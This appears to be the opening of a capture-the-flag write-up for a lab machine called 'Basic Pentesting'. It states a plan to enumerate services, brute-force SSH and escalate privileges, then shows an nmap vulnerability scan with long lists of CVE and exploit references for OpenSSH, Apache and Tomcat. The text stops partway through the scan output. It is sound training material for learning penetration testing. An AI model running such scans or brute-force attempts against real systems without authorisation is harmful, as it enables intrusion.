Basic Pentesting

author: Nathan Acks
date: 2021-11-04

Background

The description of this CTF is sparse, but the goal seems to be to (1) enumerate the services on a machine, (2) brute force a login over SSH, and (3) elevate privileges (presumably to root, but things are a little vague here).

For this attempt, the target machine IP is 10.10.74.250.

Recon

We begin by running a full nmap scan:

sudo nmap -vv -oA basic-pentesting -A -sS --script vuln \
          -p- 10.10.74.250

Output:

# Nmap 7.92 scan initiated Thu Nov  4 19:56:42 2021 as: nmap -vv -oA basic-pentesting -A -sS --script vuln -p- 10.10.74.250
Increasing send delay for 10.10.74.250 from 5 to 10 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.10.74.250 from 10 to 20 due to 11 out of 12 dropped probes since last increase.
Nmap scan report for 10.10.74.250
Host is up, received timestamp-reply ttl 61 (0.17s latency).
Scanned at 2021-11-04 19:56:54 MDT for 1378s
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:7.2p2: 
|     	PACKETSTORM:140070	7.8	https://vulners.com/packetstorm/PACKETSTORM:140070	*EXPLOIT*
|     	EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09	7.8	https://vulners.com/exploitpack/EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09	*EXPLOIT*
|     	EDB-ID:40888	7.8	https://vulners.com/exploitdb/EDB-ID:40888	*EXPLOIT*
|     	CVE-2016-8858	7.8	https://vulners.com/cve/CVE-2016-8858
|     	CVE-2016-6515	7.8	https://vulners.com/cve/CVE-2016-6515
|     	1337DAY-ID-26494	7.8	https://vulners.com/zdt/1337DAY-ID-26494	*EXPLOIT*
|     	SSV:92579	7.5	https://vulners.com/seebug/SSV:92579	*EXPLOIT*
|     	CVE-2016-10009	7.5	https://vulners.com/cve/CVE-2016-10009
|     	1337DAY-ID-26576	7.5	https://vulners.com/zdt/1337DAY-ID-26576	*EXPLOIT*
|     	SSV:92582	7.2	https://vulners.com/seebug/SSV:92582	*EXPLOIT*
|     	CVE-2016-10012	7.2	https://vulners.com/cve/CVE-2016-10012
|     	CVE-2015-8325	7.2	https://vulners.com/cve/CVE-2015-8325
|     	SSV:92580	6.9	https://vulners.com/seebug/SSV:92580	*EXPLOIT*
|     	CVE-2016-10010	6.9	https://vulners.com/cve/CVE-2016-10010
|     	1337DAY-ID-26577	6.9	https://vulners.com/zdt/1337DAY-ID-26577	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/SUSE-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/SUSE-CVE-2019-25017/	5.8	https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-25017/	*EXPLOIT*
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/IBM-AIX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/IBM-AIX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/DEBIAN-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/	*EXPLOIT*
|     	EXPLOITPACK:98FE96309F9524B8C84C508837551A19	5.8	https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19	*EXPLOIT*
|     	EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	5.8	https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	*EXPLOIT*
|     	EDB-ID:46516	5.8	https://vulners.com/exploitdb/EDB-ID:46516	*EXPLOIT*
|     	CVE-2019-6111	5.8	https://vulners.com/cve/CVE-2019-6111
|     	1337DAY-ID-32328	5.8	https://vulners.com/zdt/1337DAY-ID-32328	*EXPLOIT*
|     	1337DAY-ID-32009	5.8	https://vulners.com/zdt/1337DAY-ID-32009	*EXPLOIT*
|     	SSV:91041	5.5	https://vulners.com/seebug/SSV:91041	*EXPLOIT*
|     	PACKETSTORM:140019	5.5	https://vulners.com/packetstorm/PACKETSTORM:140019	*EXPLOIT*
|     	PACKETSTORM:136234	5.5	https://vulners.com/packetstorm/PACKETSTORM:136234	*EXPLOIT*
|     	EXPLOITPACK:F92411A645D85F05BDBD274FD222226F	5.5	https://vulners.com/exploitpack/EXPLOITPACK:F92411A645D85F05BDBD274FD222226F	*EXPLOIT*
|     	EXPLOITPACK:9F2E746846C3C623A27A441281EAD138	5.5	https://vulners.com/exploitpack/EXPLOITPACK:9F2E746846C3C623A27A441281EAD138	*EXPLOIT*
|     	EXPLOITPACK:1902C998CBF9154396911926B4C3B330	5.5	https://vulners.com/exploitpack/EXPLOITPACK:1902C998CBF9154396911926B4C3B330	*EXPLOIT*
|     	EDB-ID:40858	5.5	https://vulners.com/exploitdb/EDB-ID:40858	*EXPLOIT*
|     	CVE-2016-3115	5.5	https://vulners.com/cve/CVE-2016-3115
|     	SSH_ENUM	5.0	https://vulners.com/canvas/SSH_ENUM	*EXPLOIT*
|     	PACKETSTORM:150621	5.0	https://vulners.com/packetstorm/PACKETSTORM:150621	*EXPLOIT*
|     	MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS	5.0	https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS	*EXPLOIT*
|     	EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0	5.0	https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0	*EXPLOIT*
|     	EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283	5.0	https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283	*EXPLOIT*
|     	EDB-ID:45939	5.0	https://vulners.com/exploitdb/EDB-ID:45939	*EXPLOIT*
|     	CVE-2018-15919	5.0	https://vulners.com/cve/CVE-2018-15919
|     	CVE-2018-15473	5.0	https://vulners.com/cve/CVE-2018-15473
|     	CVE-2017-15906	5.0	https://vulners.com/cve/CVE-2017-15906
|     	CVE-2016-10708	5.0	https://vulners.com/cve/CVE-2016-10708
|     	1337DAY-ID-31730	5.0	https://vulners.com/zdt/1337DAY-ID-31730	*EXPLOIT*
|     	EDB-ID:45233	4.6	https://vulners.com/exploitdb/EDB-ID:45233	*EXPLOIT*
|     	EDB-ID:40963	4.6	https://vulners.com/exploitdb/EDB-ID:40963	*EXPLOIT*
|     	EDB-ID:40962	4.6	https://vulners.com/exploitdb/EDB-ID:40962	*EXPLOIT*
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/	*EXPLOIT*
|     	MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/	*EXPLOIT*
|     	EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF	4.3	https://vulners.com/exploitpack/EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF	*EXPLOIT*
|     	EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF	4.3	https://vulners.com/exploitpack/EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF	*EXPLOIT*
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-6210	4.3	https://vulners.com/cve/CVE-2016-6210
|     	1337DAY-ID-25440	4.3	https://vulners.com/zdt/1337DAY-ID-25440	*EXPLOIT*
|     	1337DAY-ID-25438	4.3	https://vulners.com/zdt/1337DAY-ID-25438	*EXPLOIT*
|     	CVE-2019-6110	4.0	https://vulners.com/cve/CVE-2019-6110
|     	CVE-2019-6109	4.0	https://vulners.com/cve/CVE-2019-6109
|     	CVE-2018-20685	2.6	https://vulners.com/cve/CVE-2018-20685
|     	SSV:92581	2.1	https://vulners.com/seebug/SSV:92581	*EXPLOIT*
|     	CVE-2016-10011	2.1	https://vulners.com/cve/CVE-2016-10011
|     	PACKETSTORM:151227	0.0	https://vulners.com/packetstorm/PACKETSTORM:151227	*EXPLOIT*
|     	PACKETSTORM:140261	0.0	https://vulners.com/packetstorm/PACKETSTORM:140261	*EXPLOIT*
|     	PACKETSTORM:138006	0.0	https://vulners.com/packetstorm/PACKETSTORM:138006	*EXPLOIT*
|     	PACKETSTORM:137942	0.0	https://vulners.com/packetstorm/PACKETSTORM:137942	*EXPLOIT*
|     	EDB-ID:46193	0.0	https://vulners.com/exploitdb/EDB-ID:46193	*EXPLOIT*
|     	EDB-ID:40136	0.0	https://vulners.com/exploitdb/EDB-ID:40136	*EXPLOIT*
|     	EDB-ID:40113	0.0	https://vulners.com/exploitdb/EDB-ID:40113	*EXPLOIT*
|     	EDB-ID:39569	0.0	https://vulners.com/exploitdb/EDB-ID:39569	*EXPLOIT*
|     	1337DAY-ID-30937	0.0	https://vulners.com/zdt/1337DAY-ID-30937	*EXPLOIT*
|_    	1337DAY-ID-10010	0.0	https://vulners.com/zdt/1337DAY-ID-10010	*EXPLOIT*
80/tcp   open  http        syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
| http-enum: 
|_  /development/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
| vulners: 
|   cpe:/a:apache:http_server:2.4.18: 
|     	CVE-2021-39275	7.5	https://vulners.com/cve/CVE-2021-39275
|     	CVE-2021-26691	7.5	https://vulners.com/cve/CVE-2021-26691
|     	CVE-2017-7679	7.5	https://vulners.com/cve/CVE-2017-7679
|     	CVE-2017-7668	7.5	https://vulners.com/cve/CVE-2017-7668
|     	CVE-2017-3169	7.5	https://vulners.com/cve/CVE-2017-3169
|     	CVE-2017-3167	7.5	https://vulners.com/cve/CVE-2017-3167
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/	7.2	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/	7.2	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/	*EXPLOIT*
|     	EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB	7.2	https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB	*EXPLOIT*
|     	CVE-2019-0211	7.2	https://vulners.com/cve/CVE-2019-0211
|     	1337DAY-ID-32502	7.2	https://vulners.com/zdt/1337DAY-ID-32502	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/SUSE-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE_LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/FREEBSD-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/FREEBSD-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/DEBIAN-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/APACHE-HTTPD-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/AMAZON_LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/ALPINE-LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2017-15715/	*EXPLOIT*
|     	FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	6.8	https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	*EXPLOIT*
|     	CVE-2021-40438	6.8	https://vulners.com/cve/CVE-2021-40438
|     	CVE-2020-35452	6.8	https://vulners.com/cve/CVE-2020-35452
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715
|     	4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	6.8	https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	*EXPLOIT*
|     	CVE-2019-10082	6.4	https://vulners.com/cve/CVE-2019-10082
|     	CVE-2017-9788	6.4	https://vulners.com/cve/CVE-2017-9788
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/	6.0	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/	6.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/	*EXPLOIT*
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	EDB-ID:47689	5.8	https://vulners.com/exploitdb/EDB-ID:47689	*EXPLOIT*
|     	CVE-2020-1927	5.8	https://vulners.com/cve/CVE-2020-1927
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	1337DAY-ID-33577	5.8	https://vulners.com/zdt/1337DAY-ID-33577	*EXPLOIT*
|     	CVE-2016-5387	5.1	https://vulners.com/cve/CVE-2016-5387
|     	SSV:96537	5.0	https://vulners.com/seebug/SSV:96537	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2018-1333/	5.0	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1333/	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2018-1303/	5.0	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1303/	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/	5.0	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/	5.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/	*EXPLOIT*
|     	MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED	5.0	https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED	*EXPLOIT*
|     	EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D	5.0	https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D	*EXPLOIT*
|     	EXPLOITPACK:2666FB0676B4B582D689921651A30355	5.0	https://vulners.com/exploitpack/EXPLOITPACK:2666FB0676B4B582D689921651A30355	*EXPLOIT*
|     	EDB-ID:40909	5.0	https://vulners.com/exploitdb/EDB-ID:40909	*EXPLOIT*
|     	CVE-2021-34798	5.0	https://vulners.com/cve/CVE-2021-34798
|     	CVE-2021-33193	5.0	https://vulners.com/cve/CVE-2021-33193
|     	CVE-2021-26690	5.0	https://vulners.com/cve/CVE-2021-26690
|     	CVE-2020-1934	5.0	https://vulners.com/cve/CVE-2020-1934
|     	CVE-2019-17567	5.0	https://vulners.com/cve/CVE-2019-17567
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2019-0196	5.0	https://vulners.com/cve/CVE-2019-0196
|     	CVE-2018-17199	5.0	https://vulners.com/cve/CVE-2018-17199
|     	CVE-2018-17189	5.0	https://vulners.com/cve/CVE-2018-17189
|     	CVE-2018-1333	5.0	https://vulners.com/cve/CVE-2018-1333
|     	CVE-2018-1303	5.0	https://vulners.com/cve/CVE-2018-1303
|     	CVE-2017-9798	5.0	https://vulners.com/cve/CVE-2017-9798
|     	CVE-2017-15710	5.0	https://vulners.com/cve/CVE-2017-15710
|     	CVE-2016-8743	5.0	https://vulners.com/cve/CVE-2016-8743
|     	CVE-2016-8740	5.0	https://vulners.com/cve/CVE-2016-8740
|     	CVE-2016-4979	5.0	https://vulners.com/cve/CVE-2016-4979
|     	1337DAY-ID-28573	5.0	https://vulners.com/zdt/1337DAY-ID-28573	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-0197/	4.9	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-0197/	*EXPLOIT*
|     	CVE-2019-0197	4.9	https://vulners.com/cve/CVE-2019-0197
|     	MSF:ILITIES/UBUNTU-CVE-2018-1302/	4.3	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1302/	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2018-1301/	4.3	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1301/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/	*EXPLOIT*
|     	MSF:ILITIES/DEBIAN-CVE-2019-10092/	4.3	https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-10092/	*EXPLOIT*
|     	MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/	4.3	https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/	*EXPLOIT*
|     	MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/	4.3	https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/	*EXPLOIT*
|     	EDB-ID:47688	4.3	https://vulners.com/exploitdb/EDB-ID:47688	*EXPLOIT*
|     	CVE-2020-11985	4.3	https://vulners.com/cve/CVE-2020-11985
|     	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
|     	CVE-2018-1302	4.3	https://vulners.com/cve/CVE-2018-1302
|     	CVE-2018-1301	4.3	https://vulners.com/cve/CVE-2018-1301
|     	CVE-2018-11763	4.3	https://vulners.com/cve/CVE-2018-11763
|     	CVE-2016-4975	4.3	https://vulners.com/cve/CVE-2016-4975
|     	CVE-2016-1546	4.3	https://vulners.com/cve/CVE-2016-1546
|     	4013EC74-B3C1-5D95-938A-54197A58586D	4.3	https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D	*EXPLOIT*
|     	1337DAY-ID-33575	4.3	https://vulners.com/zdt/1337DAY-ID-33575	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/	*EXPLOIT*
|     	CVE-2018-1283	3.5	https://vulners.com/cve/CVE-2018-1283
|     	CVE-2016-8612	3.3	https://vulners.com/cve/CVE-2016-8612
|     	PACKETSTORM:152441	0.0	https://vulners.com/packetstorm/PACKETSTORM:152441	*EXPLOIT*
|     	EDB-ID:46676	0.0	https://vulners.com/exploitdb/EDB-ID:46676	*EXPLOIT*
|     	EDB-ID:42745	0.0	https://vulners.com/exploitdb/EDB-ID:42745	*EXPLOIT*
|     	1337DAY-ID-663	0.0	https://vulners.com/zdt/1337DAY-ID-663	*EXPLOIT*
|     	1337DAY-ID-601	0.0	https://vulners.com/zdt/1337DAY-ID-601	*EXPLOIT*
|     	1337DAY-ID-4533	0.0	https://vulners.com/zdt/1337DAY-ID-4533	*EXPLOIT*
|     	1337DAY-ID-3109	0.0	https://vulners.com/zdt/1337DAY-ID-3109	*EXPLOIT*
|_    	1337DAY-ID-2237	0.0	https://vulners.com/zdt/1337DAY-ID-2237	*EXPLOIT*
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp  open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       syn-ack ttl 61 Apache Jserv (Protocol v1.3)
8080/tcp open  http        syn-ack ttl 61 Apache Tomcat 9.0.7
| http-enum: 
|   /examples/: Sample scripts
|   /manager/html/upload: Apache Tomcat (401 )
|   /manager/html: Apache Tomcat (401 )
|_  /docs/: Potentially interesting folder
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| vulners: 
|   cpe:/a:apache:tomcat:9.0.7: 
